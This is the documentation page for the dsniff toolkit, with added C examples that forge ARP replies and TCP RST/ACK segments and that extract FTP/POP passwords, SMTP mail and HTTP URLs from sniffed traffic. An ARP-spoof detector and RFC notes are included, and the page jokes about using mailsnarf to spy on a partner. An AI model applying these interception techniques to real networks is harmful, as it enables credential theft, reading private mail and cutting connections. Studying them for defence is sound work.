dsniff

overview

i wrote these tools with honest intentions - to audit my own network, and to demonstrate the insecurity of cleartext network protocols. please do not abuse this software.

description

arpredirect: intercept packets from a target host (or all hosts) on the LAN intended for another host on the LAN by forging ARP replies. the forged replies poison the target's ARP cache so that the other host's IP address maps to your MAC address, and the target's frames come to your port first; this is an extremely effective way of sniffing traffic on a switch, which otherwise only delivers each frame to the port that owns the destination MAC. kernel IP forwarding (or a userland program which accomplishes the same, e.g. fragrouter :-) must be turned on ahead of time, or the intercepted packets die on your host and the target loses its connection to the other host (and notices).
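the forged reply itself, plus the arpwatch-style check that catches it, as an added example in C (this is not dsniff's code; the MAC and IP addresses are made up for the demo, and the frame is only built in memory, putting it on the wire takes a raw socket or libnet):

```c
/* Added example (not dsniff's code): the forged Ethernet/ARP reply an
 * arpredirect-style tool sends, and the arpwatch-style check that catches it.
 * Frames are built in memory only; nothing is put on the wire. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ETH_ALEN   6
#define ARP_FRAME  42     /* 14-byte Ethernet header + 28-byte ARP body */

static void put32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)(v >> 24); p[1] = (uint8_t)(v >> 16);
    p[2] = (uint8_t)(v >> 8);  p[3] = (uint8_t)v;
}
static uint32_t get32(const uint8_t *p)
{
    return (uint32_t)p[0] << 24 | (uint32_t)p[1] << 16 | (uint32_t)p[2] << 8 | p[3];
}

/* Build "claimed_ip is-at sender_mac", unicast to victim_mac/victim_ip.
 * This is the shape of reply that tells the target the gateway's IP lives
 * at the attacker's MAC. Returns the frame length. */
size_t forge_arp_reply(uint8_t *f, const uint8_t sender_mac[ETH_ALEN],
                       uint32_t claimed_ip, const uint8_t victim_mac[ETH_ALEN],
                       uint32_t victim_ip)
{
    memcpy(f, victim_mac, ETH_ALEN);            /* Ethernet dst            */
    memcpy(f + 6, sender_mac, ETH_ALEN);        /* Ethernet src            */
    f[12] = 0x08; f[13] = 0x06;                 /* EtherType = ARP         */
    f[14] = 0x00; f[15] = 0x01;                 /* HTYPE = Ethernet        */
    f[16] = 0x08; f[17] = 0x00;                 /* PTYPE = IPv4            */
    f[18] = ETH_ALEN; f[19] = 4;                /* HLEN, PLEN              */
    f[20] = 0x00; f[21] = 0x02;                 /* OPER = reply            */
    memcpy(f + 22, sender_mac, ETH_ALEN);       /* SHA: MAC we want cached */
    put32(f + 28, claimed_ip);                  /* SPA: IP we are claiming */
    memcpy(f + 32, victim_mac, ETH_ALEN);       /* THA                     */
    put32(f + 36, victim_ip);                   /* TPA                     */
    return ARP_FRAME;
}

/* Detection side: remember the first MAC seen for each IP and flag any later
 * reply that rebinds the IP to a different MAC (arpwatch's "flip flop").
 * Returns 1 if the frame changes an existing binding, 0 otherwise, and -1 if
 * the frame is not an Ethernet/IPv4 ARP reply at all. */
#define MAX_BINDINGS 64
static struct { uint32_t ip; uint8_t mac[ETH_ALEN]; } bindings[MAX_BINDINGS];
static int nbindings;

int arp_watch(const uint8_t *f, size_t len)
{
    if (len < ARP_FRAME || f[12] != 0x08 || f[13] != 0x06 ||
        f[14] != 0 || f[15] != 1 || f[16] != 0x08 || f[17] != 0 ||
        f[18] != ETH_ALEN || f[19] != 4 || f[20] != 0 || f[21] != 2)
        return -1;
    uint32_t spa = get32(f + 28);
    const uint8_t *sha = f + 22;
    for (int i = 0; i < nbindings; i++) {
        if (bindings[i].ip != spa) continue;
        if (memcmp(bindings[i].mac, sha, ETH_ALEN) == 0) return 0;
        memcpy(bindings[i].mac, sha, ETH_ALEN);  /* record the new (suspect) MAC */
        return 1;
    }
    if (nbindings < MAX_BINDINGS) {
        bindings[nbindings].ip = spa;
        memcpy(bindings[nbindings].mac, sha, ETH_ALEN);
        nbindings++;
    }
    return 0;
}

/* Constructed addresses for the demo: 192.168.1.1 gateway, .10 victim. */
static const uint8_t GW_MAC[ETH_ALEN]  = {0x00,0x11,0x22,0x33,0x44,0x55};
static const uint8_t ATK_MAC[ETH_ALEN] = {0xde,0xad,0xbe,0xef,0x00,0x01};
static const uint8_t VIC_MAC[ETH_ALEN] = {0x00,0xaa,0xbb,0xcc,0xdd,0xee};
#define GW_IP  0xC0A80101u
#define VIC_IP 0xC0A8010Au

int main(void)
{
    uint8_t legit[ARP_FRAME], forged[ARP_FRAME];
    forge_arp_reply(legit,  GW_MAC,  GW_IP, VIC_MAC, VIC_IP);   /* the real gateway */
    forge_arp_reply(forged, ATK_MAC, GW_IP, VIC_MAC, VIC_IP);   /* arpredirect's lie */
    printf("legit reply flagged: %d\n", arp_watch(legit,  ARP_FRAME));
    printf("forged reply flagged: %d\n", arp_watch(forged, ARP_FRAME));
    return 0;
}
```

the watcher only sees the second reply as a problem because it already learned the gateway's real MAC; on a network where the attacker answers first, the binding it learns is the wrong one, which is why arpwatch-style tools are seeded with a known-good table.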

macof: flood the local network with frames bearing random source MAC addresses, overflowing the switch's MAC address (CAM) table. some switches then fail open into repeating mode, forwarding every frame out every port like a hub, which facilitates sniffing. a straight C port of the original Perl Net::RawIP macof program.

tcpkill: kill specified in-progress TCP connections by forging RST segments. useful for libnids-based applications, which only create a TCB for a connection once they have seen its full TCP 3-way handshake: a connection that was already up when the sniffer started is invisible to them until it is reset and re-established.

tcpnice: slow down specified in-progress TCP connections via "active" traffic shaping (useful for sniffing fast networks, where the sniffer would otherwise drop packets). forges ACKs carrying tiny TCP window advertisements, so that the sender throttles itself, and optionally ICMP source quench replies. (source quench has since been deprecated by RFC 6633 and modern stacks ignore it; the window trick still works.)
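the segments behind both tcpkill and tcpnice, as an added example in C (not dsniff's code): a RST aimed at the sender of a sniffed segment, and an ACK with a one-byte window, each with a correct TCP checksum over the IPv4 pseudo-header. the addresses, ports and sequence numbers are made up; only the TCP header is built, and the IP header and raw-socket send are left to the caller.

```c
/* Added example (not dsniff's code): forge the TCP segments behind tcpkill
 * (RST) and tcpnice (ACK with a tiny window), with a correct checksum over the
 * IPv4 pseudo-header. Built in memory only; sending needs a raw socket. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define TCP_HLEN 20
#define TH_RST   0x04
#define TH_ACK   0x10

static void put16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)(v >> 8); p[1] = (uint8_t)v; }
static void put32(uint8_t *p, uint32_t v) { put16(p, (uint16_t)(v >> 16)); put16(p + 2, (uint16_t)v); }
static uint32_t get32(const uint8_t *p)
{ return (uint32_t)p[0] << 24 | (uint32_t)p[1] << 16 | (uint32_t)p[2] << 8 | p[3]; }

/* One's-complement sum helpers (RFC 1071). */
static uint32_t csum_add(uint32_t sum, const uint8_t *p, size_t n)
{
    for (; n > 1; n -= 2, p += 2) sum += (uint32_t)(p[0] << 8 | p[1]);
    if (n) sum += (uint32_t)(p[0] << 8);          /* odd trailing byte */
    return sum;
}
static uint16_t csum_fold(uint32_t sum)
{
    while (sum >> 16) sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

/* TCP checksum over pseudo-header + segment. Run over a segment whose
 * checksum field is already filled in, it returns 0 iff the segment verifies. */
uint16_t tcp_checksum(uint32_t src_ip, uint32_t dst_ip, const uint8_t *seg, size_t len)
{
    uint8_t ph[12];
    put32(ph, src_ip); put32(ph + 4, dst_ip);
    ph[8] = 0; ph[9] = 6;                         /* zero, protocol = TCP */
    put16(ph + 10, (uint16_t)len);
    return csum_fold(csum_add(csum_add(0, ph, 12), seg, len));
}

/* Write a bare 20-byte TCP header (no options, no payload). */
size_t forge_tcp_segment(uint8_t *seg, uint32_t src_ip, uint32_t dst_ip,
                         uint16_t sport, uint16_t dport, uint32_t seq,
                         uint32_t ack, uint8_t flags, uint16_t window)
{
    memset(seg, 0, TCP_HLEN);
    put16(seg, sport); put16(seg + 2, dport);
    put32(seg + 4, seq); put32(seg + 8, ack);
    seg[12] = 0x50;                               /* data offset = 5 words */
    seg[13] = flags;
    put16(seg + 14, window);
    put16(seg + 16, tcp_checksum(src_ip, dst_ip, seg, TCP_HLEN));
    return TCP_HLEN;
}

/* tcpkill's idea: having sniffed a segment A->B, answer A as if we were B
 * with a RST whose sequence number is the value A just acknowledged, i.e.
 * exactly what A expects next, so A's stack accepts it and drops the TCB.
 * `round` * `win` lets a caller fire a few RSTs spaced a window apart in
 * case A has already advanced. */
size_t tcpkill_rst(uint8_t *seg, uint32_t a_ip, uint16_t a_port,
                   uint32_t b_ip, uint16_t b_port, uint32_t a_ack,
                   unsigned round, uint16_t win)
{
    return forge_tcp_segment(seg, b_ip, a_ip, b_port, a_port,
                             a_ack + round * win, 0, TH_RST, 0);
}

/* tcpnice's idea: pose as the receiver B and ACK A's data while advertising
 * a tiny window; A's stack must then keep no more than `tiny` bytes in
 * flight. The ACK number is A's last seq plus its payload length. */
size_t tcpnice_ack(uint8_t *seg, uint32_t a_ip, uint16_t a_port, uint32_t a_seq,
                   uint16_t a_len, uint32_t b_ip, uint16_t b_port, uint32_t b_seq,
                   uint16_t tiny)
{
    return forge_tcp_segment(seg, b_ip, a_ip, b_port, a_port, b_seq,
                             a_seq + a_len, TH_ACK, tiny);
}

uint32_t tcp_seq(const uint8_t *seg) { return get32(seg + 4); }

int main(void)
{
    /* Constructed flow: 10.0.0.5:40000 -> 10.0.0.80:80, last segment seen
     * from the client had seq 5000, 1460 bytes of data and ack 1000. */
    uint8_t rst[TCP_HLEN], ack[TCP_HLEN];
    tcpkill_rst(rst, 0x0A000005u, 40000, 0x0A000050u, 80, 1000, 0, 0);
    tcpnice_ack(ack, 0x0A000005u, 40000, 5000, 1460, 0x0A000050u, 80, 1000, 1);
    printf("RST seq=%u verifies=%d\n", (unsigned)tcp_seq(rst),
           tcp_checksum(0x0A000050u, 0x0A000005u, rst, TCP_HLEN) == 0);
    printf("ACK ack=%u win=%u\n", (unsigned)get32(ack + 8),
           (unsigned)(ack[14] << 8 | ack[15]));
    return 0;
}
```

both forgeries depend on seeing the live sequence numbers first, which is why tcpkill and tcpnice are sniffers that inject, not blind injectors; a stack that honours RFC 5961's challenge ACKs will also refuse a RST that is in-window but not exactly at the expected sequence number.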

dsniff: password sniffer. handles FTP, Telnet, HTTP, POP, poppass, NNTP, IMAP, SNMP, LDAP, Rlogin, RIP, OSPF, NFS, YP, SOCKS, X11, CVS, IRC, AIM, ICQ, Napster, PostgreSQL, Meeting Maker, Citrix ICA, Symantec pcAnywhere, NAI Sniffer, Microsoft SMB, and Oracle SQL*Net auth info. dsniff minimally parses each application protocol, only saving the interesting bits, and uses Berkeley DB as its output file format, only logging unique authentication attempts. full TCP/IP reassembly is provided by libnids(3) (likewise for the following tools as well).
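the shape of a dsniff decoder, as an added example in C (not dsniff's code): a port-triggered decode scans the reassembled client->server stream for the few bytes that matter (here the USER/PASS exchange that FTP and POP3 share) and logs each credential once. the in-memory trigger table stands in for dsniff.services, and a fixed array stands in for the Berkeley DB output; the client stream is constructed for the demo.

```c
/* Added example (not dsniff's code): the shape of a dsniff decoder. A
 * port-triggered decode scans the reassembled client->server byte stream for
 * the few bytes that matter (here USER/PASS, which FTP and POP3 share), and
 * every credential is logged once. dsniff stores them in Berkeley DB; this
 * example keeps them in a fixed array. */
#include <stdio.h>
#include <string.h>
#include <strings.h>

#define MAX_FIELD 64
#define MAX_CREDS 32

struct cred { char user[MAX_FIELD]; char pass[MAX_FIELD]; };
static struct cred creds[MAX_CREDS];
static int ncreds;

/* Log a credential unless the same user/pass pair was seen before.
 * Returns 1 if it was new, 0 if a duplicate or the table is full. */
int log_cred(const char *user, const char *pass)
{
    for (int i = 0; i < ncreds; i++)
        if (strcmp(creds[i].user, user) == 0 && strcmp(creds[i].pass, pass) == 0)
            return 0;
    if (ncreds == MAX_CREDS) return 0;
    snprintf(creds[ncreds].user, MAX_FIELD, "%s", user);
    snprintf(creds[ncreds].pass, MAX_FIELD, "%s", pass);
    ncreds++;
    return 1;
}

/* Copy the argument after "USER " / "PASS " (len bytes, no CRLF) into dst. */
static void copy_arg(char *dst, const char *src, size_t len)
{
    if (len >= MAX_FIELD) len = MAX_FIELD - 1;
    memcpy(dst, src, len);
    dst[len] = '\0';
}

/* Decode USER/PASS pairs from a client->server stream. A PASS with no
 * preceding USER is ignored; a second USER before any PASS replaces the
 * first. Returns the number of new credentials logged. */
int decode_userpass(const char *stream)
{
    char user[MAX_FIELD] = "", pass[MAX_FIELD];
    int fresh = 0;
    for (const char *p = stream; *p; ) {
        const char *eol = strstr(p, "\r\n");
        size_t len = eol ? (size_t)(eol - p) : strlen(p);
        if (len > 5 && strncasecmp(p, "USER ", 5) == 0) {
            copy_arg(user, p + 5, len - 5);
        } else if (len > 5 && strncasecmp(p, "PASS ", 5) == 0 && user[0]) {
            copy_arg(pass, p + 5, len - 5);
            fresh += log_cred(user, pass);
            user[0] = '\0';
        }
        p = eol ? eol + 2 : p + len;
    }
    return fresh;
}

/* Port -> decoder "triggers", the in-memory stand-in for dsniff.services.
 * A stream on an unlisted port is not decoded at all; that is the case the
 * troubleshooting section's -f / dsniff.services advice addresses. */
struct trigger { unsigned short port; const char *name; int (*decode)(const char *); };
static const struct trigger triggers[] = {
    { 21,  "ftp", decode_userpass },
    { 110, "pop", decode_userpass },
};

/* Returns new credentials logged, or -1 if no decoder is triggered. */
int dispatch(unsigned short dport, const char *stream)
{
    for (size_t i = 0; i < sizeof triggers / sizeof *triggers; i++)
        if (triggers[i].port == dport) return triggers[i].decode(stream);
    return -1;
}

int main(void)
{
    /* Constructed FTP client stream: one login retried, then a second user. */
    const char *ftp = "USER alice\r\nPASS s3cret\r\nSYST\r\n"
                      "USER alice\r\nPASS s3cret\r\n"
                      "USER bob\r\nPASS hunter2\r\nQUIT\r\n";
    printf("port 21: %d new credentials\n", dispatch(21, ftp));
    printf("port 2121: %d (no trigger for that port)\n", dispatch(2121, ftp));
    for (int i = 0; i < ncreds; i++)
        printf("%s:%s\n", creds[i].user, creds[i].pass);
    return 0;
}
```

the same stream on port 2121 yields nothing, not because the decoder fails but because nothing triggers it; that is the distinction the -d flag is there to make.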

mailsnarf: a fast and easy way to violate the Electronic Communications Privacy Act of 1986 (18 USC 2701-2711), be careful. outputs all messages sniffed from SMTP traffic in Berkeley mbox format, suitable for offline browsing with your favorite mail reader (mail -f, pine, etc.).
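writing a sniffed SMTP DATA phase out as mbox, as an added example in C (not mailsnarf's code). two details matter and are handled here: SMTP dot-stuffs message lines that begin with "." (RFC 5321 section 4.5.2), which must be undone, and mbox readers treat any line beginning "From " as the start of a new message, so such body lines must be quoted as ">From ". the session transcript and the date are constructed; a real tool would take the date from the capture time.

```c
/* Added example (not mailsnarf's code): write the DATA phase of a sniffed
 * SMTP session out as one mbox record, undoing SMTP dot-stuffing and quoting
 * body lines that start with "From ". */
#include <stdio.h>
#include <string.h>
#include <strings.h>

/* Append one message line (len bytes, no CRLF) to out[n..], un-stuffing the
 * leading dot and quoting "From ". Returns the new length; never overflows. */
static size_t emit_line(char *out, size_t outsz, size_t n, const char *line, size_t len)
{
    if (len > 0 && line[0] == '.') { line++; len--; }           /* un-stuff */
    if (len >= 5 && strncmp(line, "From ", 5) == 0 && n + 1 < outsz)
        out[n++] = '>';                                           /* quote  */
    for (size_t i = 0; i < len && n + 1 < outsz; i++) out[n++] = line[i];
    if (n + 1 < outsz) out[n++] = '\n';
    return n;
}

/* Extract the first complete message from a client->server SMTP stream.
 * `date` is the ctime-style stamp for the "From " separator line. Returns
 * bytes written to out, or 0 if the stream does not (yet) contain a DATA
 * block terminated by ".\r\n". A null sender (MAIL FROM:<>) is written as
 * MAILER-DAEMON, the usual mbox convention. */
size_t smtp_to_mbox(const char *stream, const char *date, char *out, size_t outsz)
{
    char sender[256] = "MAILER-DAEMON";
    int in_data = 0;
    size_t n = 0;
    out[0] = '\0';
    for (const char *p = stream; *p; ) {
        const char *eol = strstr(p, "\r\n");
        if (!eol) break;                          /* partial line, need more data */
        size_t len = (size_t)(eol - p);
        if (!in_data) {
            if (len > 10 && strncasecmp(p, "MAIL FROM:", 10) == 0) {
                const char *a = p + 10; size_t alen = len - 10;
                while (alen && *a == ' ') { a++; alen--; }
                if (alen >= 2 && a[0] == '<' && a[alen - 1] == '>') { a++; alen -= 2; }
                if (alen >= sizeof sender) alen = sizeof sender - 1;
                if (alen) { memcpy(sender, a, alen); sender[alen] = '\0'; }
            } else if (len == 4 && strncasecmp(p, "DATA", 4) == 0) {
                in_data = 1;
                int w = snprintf(out, outsz, "From %s %s\n", sender, date);
                if (w < 0 || (size_t)w >= outsz) return 0;
                n = (size_t)w;
            }
        } else if (len == 1 && p[0] == '.') {     /* end of DATA */
            if (n + 1 < outsz) out[n++] = '\n';   /* blank line closes the record */
            out[n] = '\0';
            return n;
        } else {
            n = emit_line(out, outsz, n, p, len);
        }
        p = eol + 2;
    }
    out[0] = '\0';
    return 0;
}

int main(void)
{
    /* Constructed session: a body line starting "From " and a dot-stuffed line. */
    const char *session =
        "EHLO laptop\r\nMAIL FROM:<alice@example.com>\r\nRCPT TO:<bob@example.org>\r\n"
        "DATA\r\nFrom: alice@example.com\r\nSubject: hi\r\n\r\n"
        "From the top:\r\n..hidden dot line\r\nbye\r\n.\r\nQUIT\r\n";
    char mbox[1024];
    if (smtp_to_mbox(session, "Tue Oct 10 13:55:36 2000", mbox, sizeof mbox))
        fputs(mbox, stdout);
    return 0;
}
```

note that the "From:" header line is left alone: the separator check is for "From " with a space, and a quoting rule that also caught "From:" would corrupt every message header.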

urlsnarf: output all requested URLs sniffed from HTTP traffic in CLF (Common Log Format, used by almost all web servers), suitable for offline post-processing with your favorite web log analysis tool (analog, wwwstat, etc.).
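turning sniffed HTTP requests into CLF lines, as an added example in C (not urlsnarf's code). the request side alone gives client, time, method, URL and protocol version; status and byte count live in the reply, which a request-only sniffer never sees, so they are logged as "-". the client stream, addresses and timestamp are constructed for the demo; a real tool would take the time from the capture.

```c
/* Added example (not urlsnarf's code): render sniffed HTTP requests as
 * Common Log Format lines. Status and size are "-" because only the
 * request side is parsed. */
#include <stdio.h>
#include <string.h>
#include <strings.h>

/* Find a header (case-insensitive) in a CRLF-separated header block,
 * stopping at the blank line that ends it. Returns 1 and copies the value. */
static int header_value(const char *hdrs, const char *name, char *dst, size_t dstsz)
{
    size_t nlen = strlen(name);
    for (const char *p = hdrs; p && *p; ) {
        const char *eol = strstr(p, "\r\n");
        size_t len = eol ? (size_t)(eol - p) : strlen(p);
        if (len == 0) break;                                /* end of headers */
        if (len > nlen && strncasecmp(p, name, nlen) == 0 && p[nlen] == ':') {
            const char *v = p + nlen + 1;
            while (v < p + len && *v == ' ') v++;
            size_t vlen = (size_t)(p + len - v);
            if (vlen >= dstsz) vlen = dstsz - 1;
            memcpy(dst, v, vlen); dst[vlen] = '\0';
            return 1;
        }
        p = eol ? eol + 2 : NULL;
    }
    return 0;
}

/* Render one request (request line + headers) as a CLF line into out.
 * Returns 1 on success, 0 if the request line is malformed. An HTTP/1.0
 * request without a Host header is logged under the server's IP. */
int request_to_clf(const char *client_ip, const char *server_ip, const char *when,
                   const char *req, char *out, size_t outsz)
{
    char method[16], target[512], version[16], host[256];
    if (sscanf(req, "%15s %511s %15s", method, target, version) != 3) return 0;
    if (strncasecmp(version, "HTTP/", 5) != 0) return 0;
    const char *hdrs = strstr(req, "\r\n");
    hdrs = hdrs ? hdrs + 2 : "";
    if (strncasecmp(target, "http://", 7) == 0) {         /* proxy-style absolute URL */
        snprintf(out, outsz, "%s - - [%s] \"%s %s %s\" - -",
                 client_ip, when, method, target, version);
    } else {
        if (!header_value(hdrs, "Host", host, sizeof host))
            snprintf(host, sizeof host, "%s", server_ip);
        snprintf(out, outsz, "%s - - [%s] \"%s http://%s%s %s\" - -",
                 client_ip, when, method, host, target, version);
    }
    return 1;
}

/* Walk a reassembled client->server stream, one CLF line per request.
 * Requests are split at the blank line that ends their headers (a GET has no
 * body). Returns the number of lines appended to out. */
int stream_to_clf(const char *client_ip, const char *server_ip, const char *when,
                  const char *stream, char *out, size_t outsz)
{
    int count = 0;
    size_t used = 0;
    out[0] = '\0';
    for (const char *p = stream; *p; ) {
        const char *end = strstr(p, "\r\n\r\n");
        if (!end) break;                                  /* incomplete request */
        char line[1024];
        if (request_to_clf(client_ip, server_ip, when, p, line, sizeof line)) {
            int w = snprintf(out + used, outsz - used, "%s\n", line);
            if (w < 0 || (size_t)w >= outsz - used) break;
            used += (size_t)w;
            count++;
        }
        p = end + 4;
    }
    return count;
}

int main(void)
{
    /* Constructed stream: a keep-alive request, a Host-less HTTP/1.0 one,
     * and a proxy-style request with an absolute URL. */
    const char *stream =
        "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: x\r\n\r\n"
        "GET /cgi-bin/login?u=alice HTTP/1.0\r\n\r\n"
        "GET http://proxy.example.net/p HTTP/1.1\r\nHost: proxy.example.net\r\n\r\n";
    char log[2048];
    stream_to_clf("10.0.0.5", "10.0.0.80", "10/Oct/2000:13:55:36 -0700", stream, log, sizeof log);
    fputs(log, stdout);
    return 0;
}
```

the query string is kept in the URL, which is the whole point of sniffing requests (and the reason such logs need the same handling as the password database).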

webspy: sends URLs sniffed from a client to your local Netscape browser for display, updated in real-time (as the target surfs, your browser surfs along with them, automagically). a fun party trick. :-)

installation

latest version: dsniff-2.1.tar.gz (CHANGES)

these programs require:

(if packetfactory is down, go to packetstorm or google)

built and tested on OpenBSD, Linux, and Solaris. YMMV.

troubleshooting

"not seeing anything"
  1. if you're on alpha, sorry, i suk. alpha support in next release.
  2. make sure you can see the traffic using tcpdump. if not, you suk. use arpredirect to intercept it.
  3. make sure you can see both sides of a TCP connection. if not, you suk. use the -c flag to dsniff to do half-duplex reassembly ("if you can't freak it, fake the funk").
  4. make sure the correct decode is triggering on your traffic (use the -d flag to dsniff to see). if not, you suk. dump the default triggers to dsniff.services, add the correct port mapping for your traffic, and run dsniff with -f.

"not decoding XYZ protocol"

  1. if the decode is triggering (use the -d flag to dsniff to see) but failing to produce output, i suk. send me a full traffic trace, or dump the default triggers, change the port mapping for your traffic to "hex", run dsniff with -f, and send me output.
  2. dsniff isn't magic, it only decodes what it knows about. send me full traffic traces (tcpdump -s 2000 -w /tmp/foo, or anything else supported by ethereal), and i'll see what i can do.

"my girlfriend is cheating on me"

  1. deinstall mailsnarf. you suk.

future work

filesnarf (NFS, SMB, AFS), msgsnarf (ICQ, AIM, IRC), screenspy (x11, VNC), tcptype (network application protocol detection), etc.

(don't hold your breath)


<dugsong@monkey.org>